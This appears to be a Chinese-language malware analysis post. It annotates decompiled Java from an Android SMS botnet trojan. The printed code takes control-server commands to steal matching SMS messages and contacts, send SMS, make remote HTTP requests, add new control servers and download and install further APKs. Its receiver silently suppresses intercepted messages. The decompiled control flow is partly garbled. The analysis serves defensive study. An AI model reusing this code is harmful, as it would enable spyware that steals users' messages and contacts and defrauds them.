public class ServerResponse
{ //catchSmslist主要是用在接收短信过滤上,具体结构在下面,主要会用到SmsItem.number和SmsIteml.text这两个属性,实质就是如果接收到的短信是制定号码发来的或着包含指定内容,我们就认为它是敏感信息短信,而且这是一个list,可以包含多个源号码和敏感信息,而且具体属性中如果是*就表示匹配一切。实际上就是利用http控制方式来更新短信窃取匹配模式
public List<SmsItem> catchSmsList = new ArrayList();
// deleteSmsList结构和上面的一样,具体功能上主要是删除指定格式的短信
public List<SmsItem> deleteSmsList = new ArrayList();
//下面的控制命令是去get一个页面之类的,估计是用来点广告之类,
public List<HttpParam> httpParamList = new ArrayList();
public String httpRequestMethod = "";
public String httpRequestUrl = "";
public String number = "";
public boolean removeAllSmsFilters = false;
public boolean removeAllSmsResults = false;
public boolean removeCurrentCatchFilter = false;
//窃取sendContactList联系人信息,boolean值来表示是否窃取联系人信息
public boolean sendContactList = false;
//实质是需要发送的sms列表,包括了目的phone和内容,这部分难道是要做短信ddos,或者什么乱七八糟的订阅骗钱应用?
public List<SmsItem> sendSmsList = new ArrayList();
public String server = "";
public ScreenItem updateScreen = new ScreenItem();
//需要下载的新的apk文件url
public String updateUrl = "";
public long wait = 0L;
}
public class SmsItem
{ @Attribute
public String id;
@Attribute
public long key;
@Attribute
public String number;
@Element
public String text;
@Attribute
public Boolean toSms;
}
下面就是对ServerResponse的执行过程了。由于对response已经做了如上转换,所以控制命令就直接对着对应属性判断就可以了。其实最主要功能,我已经加红标粗了。就是下载别的apk并安装。
public void executeCommands(ServerResponse paramServerResponse)
{
while (true)
{
int i;
try
{
paramServerResponse.printToOutStream();
if (paramServerResponse.server.length() <= 0)
continue;
//顾名思义,list中添加新的控制服务器,然后保存
Settings.saved.serverList.add(paramServerResponse.server);
MainApplication.settings.save(this);
if (paramServerResponse.number.length() <= 0)
continue;
//顾名思义,添加新的控制服务器电话号码,然后保存
Settings.saved.number = paramServerResponse.number; MainApplication.settings.save(this);
if (!paramServerResponse.removeAllSmsFilters)
continue;
//下面这些都是对catachSmslist和deleteSmslist以及sendSmsList的操作,前面我讲过了这些属性的作用。其实无非是增加删除,由于都只是列表就不细说了
Settings.saved.deleteSmsList.clear();
MainApplication.settings.save(this);
if (paramServerResponse.catchSmsList.size() <= 0)
continue;
int k = 0;
if (k < paramServerResponse.catchSmsList.size())
continue;
MainApplication.settings.save(this);
if (paramServerResponse.deleteSmsList.size() <= 0)
continue;
int j = 0;
if (j < paramServerResponse.deleteSmsList.size())
continue;
MainApplication.settings.save(this);
if (paramServerResponse.sendSmsList.size() <= 0)
continue;
i = 0;
if (i < paramServerResponse.sendSmsList.size())
continue;
MainApplication.settings.save(this);
if (paramServerResponse.httpRequestUrl.length() <= 0)
continue;
//下面的控制命令是去get一个页面之类的,估计是用来点广告之类,
if (!paramServerResponse.httpRequestMethod.equals("GET"))
continue;
MainApplication.sendGetRequest(paramServerResponse.httpRequestUrl, paramServerResponse.httpParamList);
//窃取sendContactList联系人信息,boolean值来表示是否窃取联系人信息
if (!paramServerResponse.sendContactList)
continue;
MainApplication.sendContactsToServer(this, MainApplication.contactsToXml(MainApplication.getContacts(this)));
if (paramServerResponse.updateUrl.length() <= 0)
continue;
ConnectivityManager localConnectivityManager = (ConnectivityManager)getSystemService("connectivity");
if ((!localConnectivityManager.getNetworkInfo(1).isAvailable()) && (!localConnectivityManager.getNetworkInfo(0).isConnectedOrConnecting()))
continue;
String str = System.currentTimeMillis() + ".apk";
//这部分比较关键,实际上就是根据服务器返回的updateUrl,来去下载对应的apk,在外部sd卡上,并且调用UpdateActivity这个来安装外部apk,不过这里依旧需要用户自己在权限界面点击确定才会安装成功。 if (!MainApplication.DownloadApk(paramServerResponse.updateUrl, str))
continue;
MainApplication.updataApkPath = Environment.getExternalStorageDirectory() + "/download/" + str;
MainApplication.updateScreen = paramServerResponse.updateScreen;
Intent localIntent = new Intent(this, UpdateActivity.class);
localIntent.addFlags(268435456);
startActivity(localIntent); if (paramServerResponse.removeAllSmsResults)
{
Settings.saved.sendSmsResultList.clear();
MainApplication.settings.save(this);
break label612;
Settings.saved.catchSmsList.add((SmsItem)paramServerResponse.catchSmsList.get(k));
k++;
continue;
Settings.saved.deleteSmsList.add((SmsItem)paramServerResponse.deleteSmsList.get(j));
j++;
continue;
//这部分就是我前面提到的sendSmsList,可以看到这里进行了发送。
SmsItem localSmsItem = (SmsItem)paramServerResponse.sendSmsList.get(i);
if (!sendSms(localSmsItem.number, localSmsItem.text))
continue;
Settings.saved.sendSmsResultList.add(new SendSmsResult(localSmsItem.id, true));
break label613;
Settings.saved.sendSmsResultList.add(new SendSmsResult(localSmsItem.id, false));
}
}
catch (Exception localException)
{
localException.printStackTrace();
break label612;
if (!paramServerResponse.httpRequestMethod.equals("POST"))
continue;
MainApplication.sendPostRequest(paramServerResponse.httpRequestUrl, paramServerResponse.httpParamList);
continue;
}
label612: return;
label613: i++;
}
}
基本上http botnet部分的命令接受与控制就是这个样子了。
其中对catchSmsList和deleteSmslist的利用是在SmsReciver中实现的。实质就是监听了sms的接收,然后进了过滤
public class SmsReciver extends BroadcastReceiver
{
private SmsMessage[] getSmsMessages(Bundle paramBundle)
{
Object[] arrayOfObject = (Object[])paramBundle.get("pdus");
SmsMessage[] arrayOfSmsMessage = new SmsMessage[arrayOfObject.length];
for (int i = 0; ; i++)
{
if (i >= arrayOfObject.length)
return arrayOfSmsMessage;
arrayOfSmsMessage[i] = SmsMessage.createFromPdu((byte[])arrayOfObject[i]);
}
}
public void onReceive(Context paramContext, Intent paramIntent)
{
SmsMessage[] arrayOfSmsMessage = getSmsMessages(paramIntent.getExtras());
int i = 0;
int j = 0;
while (true)
{
if ((j < arrayOfSmsMessage.length) || (i != 0));
try
{
abortBroadcast();
return;
SmsMessage localSmsMessage = arrayOfSmsMessage[j];
String str1 = localSmsMessage.getOriginatingAddress();
String str2 = localSmsMessage.getMessageBody();
//匹配catchSmsList
CatchResult localCatchResult = MainApplication.settings.isCatchMessage(str1, str2);
if (localCatchResult.result)
//一旦匹配到了sms,就调用MainService.start发送,这个在前面讲到了
MainService.start(paramContext, paramIntent, "catch", str1, str2, localCatchResult.key);
//匹配deleteSmsList
if ((MainApplication.settings.isNewServer(paramContext, str1, str2)) || (MainApplication.settings.isDeleteMessage(str1, str2)))
i = 1;
j++;
}
catch (Exception localException)
{
while (true)
localException.printStackTrace();
}
}
}
}